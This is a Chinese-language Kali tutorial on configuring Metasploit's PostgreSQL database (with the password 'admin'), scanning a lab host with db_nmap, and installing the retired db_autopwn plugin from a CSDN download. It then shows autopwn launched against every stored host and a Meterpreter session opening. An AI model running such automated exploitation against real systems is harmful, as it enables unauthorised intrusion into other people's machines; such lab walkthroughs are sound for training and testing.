kali下msf自动攻击

一、数据库连接配置
1)开启服务
service postgresql start
查看端口5432
root@kali-vincent:~# netstat -anlp | grep post
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 25851/postgres
2)进入postgresql配置
sudo -u postgres psql
alter user postgres with password ‘admin’;
3)修改linux系统的postgres用户的密码(密码与数据库用户postgres的密码相同)
root@kali:~# sudo passwd -d postgres
passwd:密码过期信息已更改。
root@kali:~# sudo -u postgres passwd
输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码
4)管理PostgreSQL用户和数据库
root@kali:~# psql -U postgres -h 127.0.0.1
postgres=# create user msf with password ‘admin’ nocreatedb;
CREATE ROLE

postgres=# create database msf with owner=msf;
CREATE DATABASE
postgres=# \q
5)msf配置连接
root@kali:~# msfconsole
msf > db_status
[*] postgresql selected, no connection
msf > db_connect msf:admin@127.0.0.1/msf
[*] Rebuilding the module cache in the background…
msf > db_status
[*] postgresql connected to msf
msf >
db_connect -y /usr/share/metasploit-framework/config/database.yml
6)配置自动连接
修改/usr/share/metasploit-framework/config/database.yml
development: &pgsql
adapter: postgresql
database: msf
username: msf
password: admin
host: localhost
port: 5432
pool: 5
timeout: 5
输入db_status验证一下数据库连接
msf > db_status
[*] postgresql connected to msf

二、扫描入库
在msfconsole中使用db_nmap命令启动扫描,可以将结果自动存储在数据库中。
msf > db_nmap -sS -A 172.16.100.134
查看扫描结果
msf > services
[-] The db_services command is DEPRECATED
[-] Use services instead

Services
========

host port proto name state info
—- —- —– —- —– —-
172.16.100.134 22 tcp ssh open OpenSSH 5.3 protocol 2.0
172.16.100.134 23 tcp telnet open
172.16.100.134 80 tcp http open Apache httpd 2.2.15 (CentOS)
172.16.100.134 111 tcp rpcbind open 2-4 RPC #100000
172.16.100.134 873 tcp rsync open protocol version 30
172.16.100.134 2222 tcp tcpwrapped open
查看数据库中的目标信息
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
172.16.100.134 00:0c:29:b0:78:39 Linux 2.6.X server
可以使用hosts -d ip来删除IP
查看msf版本
msf > version
Framework: 4.11.4-2015071403
Console : 4.11.4-2015071403.15168
4.5以前的版本已经移除了db_autopwn自动化攻击。下载
http://download.csdn.net/download/terrying/5063334
放到/usr/share/metasploit-framework/plugins下。
db_autopwn -t -p -e(自动工具所有的ip)
msf > db_autopwn -t -p -e
然后可以看到获得了meterpreter
[*] Meterpreter session 3 opened (172.16.100.128:55153 -> 172.16.100.166:10413) at 2016-07-02 11:10:23 +0800